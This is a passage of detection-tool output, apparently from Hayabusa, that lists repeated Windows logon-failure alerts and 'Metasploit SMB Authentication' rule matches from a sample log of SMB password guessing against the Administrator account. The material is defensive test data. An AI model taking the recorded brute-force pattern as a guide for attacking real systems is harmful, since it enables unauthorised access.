Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 